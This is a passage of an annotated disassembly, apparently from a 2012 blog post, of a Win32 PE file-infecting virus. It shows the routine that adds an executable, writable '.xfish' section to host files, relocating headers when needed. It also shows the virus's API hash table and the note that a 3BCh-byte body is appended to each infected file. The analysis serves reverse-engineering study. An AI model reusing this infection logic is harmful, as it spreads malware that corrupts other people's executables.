.Lonely:004012A3 add esi, [esi+3Ch] ; esi = PE header ("PE" signature)
.Lonely:004012A6 movzx ecx, word ptr [esi+14h] ; SizeOfOptionalHeader
.Lonely:004012AA lea edi, [esi+ecx+18h] ; edi = first section header
.Lonely:004012AE lea edx, [esi+74h] ; &NumberOfRvaAndSizes
.Lonely:004012B1 cmp dword ptr [edx], 10h
.Lonely:004012B4 jl short loc_4012BD ; fewer than 16 directories: nothing to clear
.Lonely:004012B6 mov dword ptr [edx+5Ch], 0 ; zero DataDirectory[11] (Bound Import), which normally lives in the header area that may be moved
.Lonely:004012BD
.Lonely:004012BD loc_4012BD: ; CODE XREF: sub_40129C+18j
.Lonely:004012BD mov edx, [edi+14h] ; first section's PointerToRawData (file offset)
.Lonely:004012C0 add edx, ebx ; edx = end of header space in the buffer
.Lonely:004012C2 movzx ecx, word ptr [esi+6] ; NumberOfSections
.Lonely:004012C6 imul ecx, 28h ; * sizeof(IMAGE_SECTION_HEADER)
.Lonely:004012C9 add edi, ecx ; edi = end of the section table
.Lonely:004012CB push edx ; keep the header-space end across the compare
.Lonely:004012CC mov eax, edi
.Lonely:004012CE sub edx, eax ; free bytes after the section table
.Lonely:004012D0 cmp edx, 28h ; room for one more section header?
.Lonely:004012D3 pop edx
.Lonely:004012D4 jge short loc_401307 ; yes: add the section
.Lonely:004012D6 cmp word ptr [ebx+0Ch], 'EP' ; PE header already at offset 0Ch (header already relocated)?
.Lonely:004012DC jnz short loc_4012E6
.Lonely:004012DE xor eax, eax
.Lonely:004012E0 mov [esp+20h+var_4], eax ; returned eax = 0: failure
.Lonely:004012E4 jmp short loc_401352
.Lonely:004012E6 ; ---------------------------------------------------------------------------
.Lonely:004012E6
.Lonely:004012E6 loc_4012E6: ; CODE XREF: sub_40129C+40j
.Lonely:004012E6 sub eax, esi ; eax = length of PE header + section table
.Lonely:004012E8 xchg eax, ecx ; ecx = that length
.Lonely:004012E9 pusha ; inner frame: the two stores below set the esi/edi values restored by the popa at 004012FF
.Lonely:004012EA lea edi, [ebx+0Ch] ; destination: file offset 0Ch
.Lonely:004012ED mov [esp+40h+var_3C], edi ; inner saved-ESI = new PE header location
.Lonely:004012F1 cld
.Lonely:004012F2 rep movsb ; move header + section table down to offset 0Ch
.Lonely:004012F4 mov [esp+40h+var_40], edi ; inner saved-EDI = new end of the section table
.Lonely:004012F7 sub edx, edi ; bytes from there to the first section's raw data
.Lonely:004012F9 xchg ecx, edx
.Lonely:004012FB xor eax, eax
.Lonely:004012FD rep stosb ; zero the freed space
.Lonely:004012FF popa ; esi = new PE header, edi = new end of the section table
.Lonely:00401300 mov dword ptr [ebx+3Ch], 0Ch ; e_lfanew = 0Ch
.Lonely:00401307
.Lonely:00401307 loc_401307: ; CODE XREF: sub_40129C+38j
.Lonely:00401307 inc word ptr [esi+6] ; NumberOfSections++
.Lonely:0040130B mov dword ptr [edi], 'ifx.' ; Name = ".xfish" (first 6 bytes only)
.Lonely:00401311 mov word ptr [edi+4], 'hs'
.Lonely:00401317 push [esp+20h+arg_4]
.Lonely:0040131B pop dword ptr [edi+10h] ; SizeOfRawData = arg_4
.Lonely:0040131E lea edx, [edi-28h] ; edx = previous (last existing) section header
.Lonely:00401321 mov eax, [edx+14h] ; prev.PointerToRawData
.Lonely:00401324 mov ecx, [edx+10h] ; prev.SizeOfRawData
.Lonely:00401327 add eax, ecx
.Lonely:00401329 mov [edi+14h], eax ; PointerToRawData = end of previous section's raw data (assumed to be the end of file)
.Lonely:0040132C mov [esp+20h+var_4], eax ; returned eax = PointerToRawData
.Lonely:00401330 push [esp+20h+arg_4]
.Lonely:00401334 pop dword ptr [edi+8] ; VirtualSize = arg_4
.Lonely:00401337 push dword ptr [esi+50h] ; SizeOfImage
.Lonely:0040133A pop eax
.Lonely:0040133B mov [edi+0Ch], eax ; VirtualAddress = old SizeOfImage
.Lonely:0040133E mov [esp+20h+var_C], eax ; returned edx = new section RVA
.Lonely:00401342 mov dword ptr [edi+24h], 0E0000020h ; Characteristics: code | executable | readable | writable
.Lonely:00401349 mov ecx, [edi+8]
.Lonely:0040134C add ecx, [edi+0Ch]
.Lonely:0040134F mov [esi+50h], ecx ; SizeOfImage = VirtualAddress + VirtualSize (unaligned)
.Lonely:00401352
.Lonely:00401352 loc_401352: ; CODE XREF: sub_40129C+48j
.Lonely:00401352 popa
.Lonely:00401353 retn 8
.Lonely:00401353 sub_40129C endp
.Lonely:00401353
.Lonely:00401353 ; ---------------------------------------------------------------------------
.Lonely:00401356 ; Data area of the body: the saved original entry point, then the API hash
.Lonely:00401356 ; table used by sub_4010E9. Table layout: dword hash (rol 3 / xor over the
.Lonely:00401356 ; export name) followed by a dword slot that receives the resolved address;
.Lonely:00401356 ; a zero hash ends the table. The IDA labels sit on the hash dwords; the
.Lonely:00401356 ; slot is the dword after each label. Which API each hash denotes is taken
.Lonely:00401356 ; from the author's labels and from the argument patterns at the call sites.
.Lonely:00401356 byte_401356 db 68h ; 68h = push imm32 opcode; with the dword below and the retn at 0040135B this forms "push <OEP> / retn" — NOTE(review): no visible path executes it, only the dword is referenced
.Lonely:00401357 off_401357 dd offset byte_401356 ; host's original entry point VA: written at 00401215, read at 00401092; the initial value is a placeholder
.Lonely:00401357 ; .Lonely:00401215w
.Lonely:0040135B ; ---------------------------------------------------------------------------
.Lonely:0040135B retn ; 0C3h, see note at byte_401356
.Lonely:0040135B ; ---------------------------------------------------------------------------
.Lonely:0040135C closehandle db 16h ; DATA XREF: sub_40100C+Cr
.Lonely:0040135C ; table start (edi in sub_40100C); hash 0C0D6D616h
.Lonely:0040135D db 0D6h ; ?
.Lonely:0040135E db 0D6h ; ?
.Lonely:0040135F db 0C0h ; ?
.Lonely:00401360 unk_401360 db 0 ; DATA XREF: .Lonely:00401292r
.Lonely:00401360 ; slot: one-argument call at 00401292 with the file handle (CloseHandle)
.Lonely:00401361 db 0
.Lonely:00401362 db 0
.Lonely:00401363 db 0
.Lonely:00401364 creatfile_0 db 7Ah ; z
.Lonely:00401364 ; hash 38C62A7Ah
.Lonely:00401365 db 2Ah ; *
.Lonely:00401366 db 0C6h ; ?
.Lonely:00401367 db 38h ; 8
.Lonely:00401368 creatfile_1 db 0 ; DATA XREF: .Lonely:0040119Ar
.Lonely:00401368 ; slot: seven-argument call at 0040119A (CreateFileA)
.Lonely:00401369 db 0
.Lonely:0040136A db 0
.Lonely:0040136B getbinarytypea db 0 ; last byte of the creatfile_1 slot; the label is misplaced, the real hash is the next dword
.Lonely:0040136C dd 0ABD10842h ; hash
.Lonely:00401370 getbinarytypea_0 dd 0 ; DATA XREF: sub_401160+7r
.Lonely:00401370 ; slot: two-argument call in sub_401160 (GetBinaryTypeA)
.Lonely:00401374 dd 9554EFE7h ; hash
.Lonely:00401378 getfilesize dd 0 ; DATA XREF: .Lonely:004011ADr
.Lonely:00401378 ; slot: two-argument call at 004011AD (GetFileSize)
.Lonely:0040137C dd 0BE25545h ; hash
.Lonely:00401380 readfile dd 0 ; DATA XREF: .Lonely:004011DFr
.Lonely:00401380 ; slot: five-argument call at 004011DF (ReadFile)
.Lonely:00401384 dd 0A97175F9h ; hash
.Lonely:00401388 setfilepointer dd 0 ; DATA XREF: .Lonely:00401250r
.Lonely:00401388 ; slot: one-argument call at 00401250 — matches SetEndOfFile, so this label and the next look swapped
.Lonely:0040138C dd 0A9D1FD70h ; hash
.Lonely:00401390 setendoffile dd 0 ; DATA XREF: .Lonely:00401222r
.Lonely:00401390 ; .Lonely:00401249r ...
.Lonely:00401390 ; slot: four-argument calls at 00401222 / 00401249 / 00401260 (SetFilePointer pattern)
.Lonely:00401394 dd 0AB16D0AEh ; hash
.Lonely:00401398 virtualalloc_0 dd 0 ; DATA XREF: .Lonely:004011BEr
.Lonely:00401398 ; slot: four-argument call at 004011BE (VirtualAlloc)
.Lonely:0040139C dd 0B562D3DBh ; hash
.Lonely:004013A0 writefile dd 0 ; DATA XREF: .Lonely:0040128Br
.Lonely:004013A0 ; slot: three-argument call at 0040128B (address, size, 4000h) — VirtualFree pattern, not WriteFile
.Lonely:004013A4 dd 58D8C545h ; hash
.Lonely:004013A8 writefile_0 dd 0 ; DATA XREF: .Lonely:00401235r
.Lonely:004013A8 ; .Lonely:00401276r
.Lonely:004013A8 ; slot: five-argument calls at 00401235 and 00401276 (WriteFile)
.Lonely:004013AC db 89h ; hash 0A412FD89h (bytes 89 FD 12 A4); its slot at 004013B0 is [edi+54h], called at 00401031 with the "user32" string (LoadLibraryA per the author)
.Lonely:004013AD db 0FDh ; ?
.Lonely:004013AE db 12h
.Lonely:004013AF db 0A4h ; ?
.Lonely:004013B0 db 0 ; slot for the entry above
.Lonely:004013B1 db 0
.Lonely:004013B2 db 0
.Lonely:004013B3 db 0
.Lonely:004013B4 db 51h ; hash 14D14C51h (bytes 51 4C D1 14); its slot at 004013B8 is [edi+5Ch], called at 0040108F (MessageBoxA pattern)
.Lonely:004013B5 db 4Ch ; L
.Lonely:004013B6 db 0D1h ; ?
.Lonely:004013B7 db 14h
.Lonely:004013B8 db 0 ; slot for the entry above
.Lonely:004013B9 db 0
.Lonely:004013BA db 0
.Lonely:004013BB db 0
.Lonely:004013BC db 0 ; zero hash: end of table. 004013BC is also the end of the 3BCh-byte body that gets appended to infected files (cf. the section's virtual size)
.Lonely:004013BD db 0
.Lonely:004013BE db 0
.Lonely:004013BF db 0
.Lonely:004013C0 db 0 ; 004013C0..004013FF: section padding, not part of the copied body
.Lonely:004013C1 db 0
.Lonely:004013C2 db 0
.Lonely:004013C3 db 0
.Lonely:004013C4 db 0
.Lonely:004013C5 db 0
.Lonely:004013C6 db 0
.Lonely:004013C7 db 0
.Lonely:004013C8 db 0
.Lonely:004013C9 db 0
.Lonely:004013CA db 0
.Lonely:004013CB db 0
.Lonely:004013CC db 0
.Lonely:004013CD db 0
.Lonely:004013CE db 0
.Lonely:004013CF db 0
.Lonely:004013D0 db 0
.Lonely:004013D1 db 0
.Lonely:004013D2 db 0
.Lonely:004013D3 db 0
.Lonely:004013D4 db 0
.Lonely:004013D5 db 0
.Lonely:004013D6 db 0
.Lonely:004013D7 db 0
.Lonely:004013D8 db 0
.Lonely:004013D9 db 0
.Lonely:004013DA db 0
.Lonely:004013DB db 0
.Lonely:004013DC db 0
.Lonely:004013DD db 0
.Lonely:004013DE db 0
.Lonely:004013DF db 0
.Lonely:004013E0 db 0
.Lonely:004013E1 db 0
.Lonely:004013E2 db 0
.Lonely:004013E3 db 0
.Lonely:004013E4 db 0
.Lonely:004013E5 db 0
.Lonely:004013E6 db 0
.Lonely:004013E7 db 0
.Lonely:004013E8 db 0
.Lonely:004013E9 db 0
.Lonely:004013EA db 0
.Lonely:004013EB db 0
.Lonely:004013EC db 0
.Lonely:004013ED db 0
.Lonely:004013EE db 0
.Lonely:004013EF db 0
.Lonely:004013F0 db 0
.Lonely:004013F1 db 0
.Lonely:004013F2 db 0
.Lonely:004013F3 db 0
.Lonely:004013F4 db 0
.Lonely:004013F5 db 0
.Lonely:004013F6 db 0
.Lonely:004013F7 db 0
.Lonely:004013F8 db 0
.Lonely:004013F9 db 0
.Lonely:004013FA db 0
.Lonely:004013FB db 0
.Lonely:004013FC db 0
.Lonely:004013FD db 0
.Lonely:004013FE db 0
.Lonely:004013FF db 0
.Lonely:004013FF _Lonely ends

 

posted @ 2012-07-03 08:52  麦小扣_刘